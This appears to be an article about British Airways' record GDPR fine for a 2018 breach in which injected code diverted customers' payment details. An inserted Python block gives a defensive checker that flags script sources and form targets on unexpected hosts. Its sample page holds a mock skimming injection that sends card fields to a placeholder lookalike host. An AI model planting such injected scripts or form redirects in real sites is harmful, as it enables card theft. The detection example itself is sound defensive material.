British Airways is set to be fined £183.4 million for a data breach that affected around 500,000 customers last year.
The airline, owned by IAG, says it is “surprised and disappointed” by the penalty – the largest ever fine for a data breach and the first to be issued in the UK under the GDPR (General Data Protection Regulation).
Few details emerged when the breach was originally disclosed in September 2018, with British Airways simply stating that it had been subject to a “sophisticated, malicious criminal attack” that compromised the personal and financial details of visitors to the airline’s website and mobile app.
A cyber security firm claimed that criminal hackers had injected malicious code into British Airways’ website, diverting traffic to a fraudulent replica.
This would mean that customers were handing their information to fraudsters as they entered their login details, payment card information, address and travel booking information into the bogus site.
The ICO’s (Information Commissioner’s Office) investigation confirmed this, and also found that the breach was more extensive than British Airways thought. The incident began in June 2018 rather than in September as the airline had claimed, which meant that its estimate of 380,000 affected customers was at least 100,000 short of the actual figure.
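A defender-side check for the kind of tampering described above, in which injected code sends card details to a lookalike host: given the HTML of a checkout page, it lists every script source and form target whose host is not on an allowlist. This is an added example, not code from the article or from British Airways, and the page and hostnames are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class ResourceCollector(HTMLParser):
    # Records where <script> tags load from and where <form> tags post to.
    def __init__(self):
        super().__init__()
        self.script_srcs, self.form_actions = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

def host_of(url, page_host):
    # Relative URLs resolve to the page's own host; absolute and
    # protocol-relative ("//x/y.js") URLs carry their own host.
    return (urlparse(url).hostname or page_host).lower()

def find_unexpected_origins(html, page_host, allowed_hosts):
    # Return (kind, host) pairs for script sources or form targets not on the allowlist.
    collector = ResourceCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts} | {page_host.lower()}
    findings = []
    for kind, urls in (("script", collector.script_srcs), ("form", collector.form_actions)):
        for url in urls:
            host = host_of(url, page_host)
            if host not in allowed:
                findings.append((kind, host))
    return findings

# Constructed checkout page; the hostnames are placeholders, not real sites.
SAMPLE_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.airline.example/lib.js"></script>
<script src="//lookalike-payments.example/inject.js"></script>
</head><body>
<form action="https://lookalike-payments.example/collect" method="post">
  <input name="card_number"><input name="cvv"><button>Pay</button>
</form></body></html>"""

if __name__ == "__main__":
    for kind, host in find_unexpected_origins(SAMPLE_HTML, "airline.example", ["cdn.airline.example"]):
        print(f"unexpected {kind} target: {host}")
```

Running the same check against a known-good copy of the page and after each deployment turns an unexpected host into an alert rather than a months-long silent leak.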
What happens now?
British Airways has 28 days to appeal, which it will almost certainly do.
Willie Walsh, chief executive of IAG, said: “We intend to take all appropriate steps to defend the airline’s position vigorously, including making any necessary appeals”.
The airline’s case will be helped by the fact that it has since improved its online security mechanisms. However, even if those remedial steps are enough to reduce the fine, the organisation will still face a huge penalty.
A landmark GDPR case
Things could have been worse for British Airways – but not by much. The ICO determined that the airline’s security and response weren’t poor enough to justify the maximum fine under the GDPR, which is 4% of the organisation’s annual global turnover.
Instead, the £183.4 million fine represents 1.5% of British Airways’ 2017 annual turnover.
No one could argue that the penalty was lenient, though; it’s a little under £183 million more than the £500,000 fine handed out to Facebook less than a year ago, which was the previous record fine for a data breach in the UK.
The staggering difference in fines shows how influential the GDPR is. Before the Regulation took effect, £500,000 was the maximum penalty the ICO could levy, which is hardly a deterrent to an organisation like Facebook, which reportedly makes that much money every five and a half minutes.
That’s not to say the aim of the GDPR is to cripple organisations financially. That would only make things worse: regulators want organisations to invest in information security, and if they have to fork out huge sums in penalties they’ll have less to spend on defence mechanisms.
However, penalties must be big enough to act as a deterrent, and with the GDPR that’s finally the case for everybody. After all, it’s not just huge corporations that need to worry; every organisation faces cyber security risks and the majority of incidents that the ICO investigates relate to SMEs.
Now that the first GDPR fine has arrived, we expect a steady stream to follow. They won’t all be as astronomical as the British Airways incident, but they will all be significant relative to the organisation’s size.
If you still doubted that the GDPR is something you need to worry about, this is the time to face the facts. Data protection and privacy have become crucial issues in modern business, and organisations must address them if they are to avoid data breaches and unhappy customers.